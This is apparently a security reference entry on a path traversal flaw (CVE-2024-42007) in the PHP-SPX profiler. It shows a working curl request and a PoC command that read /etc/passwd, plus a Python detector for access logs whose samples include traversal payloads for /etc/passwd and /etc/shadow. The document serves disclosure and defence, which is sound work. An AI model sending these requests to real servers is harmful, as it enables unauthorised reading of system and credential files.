php-spx

PHP-SPX is a lightweight, open-source PHP profiling tool designed to help developers analyze and debug application performance. It integrates with PHP applications to collect detailed runtime metrics such as function call counts, execution times, and memory usage. PHP-SPX provides a web-based interface for visualizing this data, enabling easy identification of bottlenecks and optimization opportunities without significant overhead or complex setup.

Local File Inclusion

PHP-SPX versions up to 0.4.15 are affected by a path traversal vulnerability (CVE-2024-42007) allowing unauthenticated attackers to read arbitrary files from the server. This issue arises from improper sanitization of the SPX_UI_URI parameter.

Exploitation requires crafting a specially formatted request to the vulnerable endpoint, leveraging the traversal flaw to specify the target file's path. Note that the SPX_KEY, a secret token used to authenticate requests to the profiler UI/API, will need to be included in the request (e.g. via phpinfo.php), as mentioned in the official documentation:

Just open with your browser the following URL: http://localhost/?SPX_KEY=dev&SPX_UI_URI=/ to access to the web UI control panel.

# Manual request
$ curl -s --path-as-is "http://spx/index.php/?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=/../../../../../../../etc/passwd"

A Python-based PoC exploit exists that automates the process, facilitating the extraction of sensitive information remotely.

python3 CVE_2024_42007.py -t http://spx -f /etc/passwd
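
On the detection side, requests of the shape shown above leave a recognizable trace in web server access logs: a SPX_UI_URI query parameter whose decoded value contains ".." path segments. The following Python sketch is an added example, not code from the original page or from the php-spx project; it assumes combined-format access logs that record the full query string, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php/?SPX_KEY=dev&SPX_UI_URI=/ HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /index.php/?SPX_KEY=dev&SPX_UI_URI=/../../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.9 - - [01/Jan/2025:10:00:06 +0000] "GET /?SPX_KEY=dev&SPX_UI_URI=%2f%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2025:10:00:07 +0000] "GET /?SPX_UI_URI=%252e%252e%252fetc%252fhosts&SPX_KEY=dev HTTP/1.1" 404 0',
    '198.51.100.2 - - [01/Jan/2025:10:01:00 +0000] "GET /app.php?page=../x HTTP/1.1" 200 10',
]

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded dots and slashes are caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def spx_traversal(line):
    """Return the decoded SPX_UI_URI if it contains a '..' segment, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != "SPX_UI_URI":
            continue  # other parameters (e.g. page=../x) are out of scope here
        path = fully_decode(value).replace("\\", "/")
        if ".." in path.split("/"):
            return path
    return None

def scan(lines):
    """Return (line_number, decoded_path) for every suspicious request."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := spx_traversal(line))]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: SPX_UI_URI traversal -> {path}")
```

A 200 response with a non-trivial body size on a flagged line is the one to triage first, since it suggests file content was actually returned.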
